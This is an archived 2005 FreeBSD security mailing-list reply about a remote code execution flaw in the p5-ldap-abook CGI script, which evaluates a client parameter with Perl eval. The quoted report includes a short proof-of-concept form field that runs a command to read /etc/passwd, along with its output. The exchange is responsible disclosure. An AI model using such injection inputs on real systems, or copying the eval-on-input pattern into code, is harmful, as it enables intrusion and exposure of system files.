Date: Fri, 18 Nov 2005 11:17:47 +0100 From: "Simon L. Nielsen" <simon@FreeBSD.org> To: Roman Mashirov <mrj@mrj.spb.ru> Cc: ports@FreeBSD.org, security@FreeBSD.org Subject: Re: FreeBSD Port: p5-ldap-abook-1.00 Message-ID: <20051118101746.GB98443@eddie.nitro.dk> In-Reply-To: <437DA508.8070409@mrj.spb.ru> References: <437DA508.8070409@mrj.spb.ru>
next in thread | previous in thread | raw e-mail | index | archive | help
--4bRzO86E/ozDv8r1 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On 2005.11.18 12:55:20 +0300, Roman Mashirov wrote: > This cgi script contains remote code exec. In the following code (line 12= 8): > my $attr =3D eval $query->param(entry); > script directly evaluates cgi paramter, received form client, so <input= =20 > type=3Dhidden name=3Dentry value=3D"system 'cat /etc/passwd';"> leads to = the=20 > following output from script: >=20 > # $FreeBSD: src/etc/master.passwd,v 1.39 2004/08/01 21:33:47 markm Exp $= =20 > # root:*:0:0:Charlie &:/root:/bin/csh Yay! :-/ Have you tried to exploit it and verified that this exploit works? (I don't see any input checking from a quick check but I cannot check before tonight CET). --=20 Simon L. Nielsen FreeBSD Security Team --4bRzO86E/ozDv8r1 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2 (FreeBSD) iD8DBQFDfapKh9pcDSc1mlERAnLoAJ0S84Mno7cYlFIClufZ6FTmC8dTbgCfbWSq FOQWhGL0G7yFgBntzeJSi/o= =6LX8 -----END PGP SIGNATURE----- --4bRzO86E/ozDv8r1--
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20051118101746.GB98443>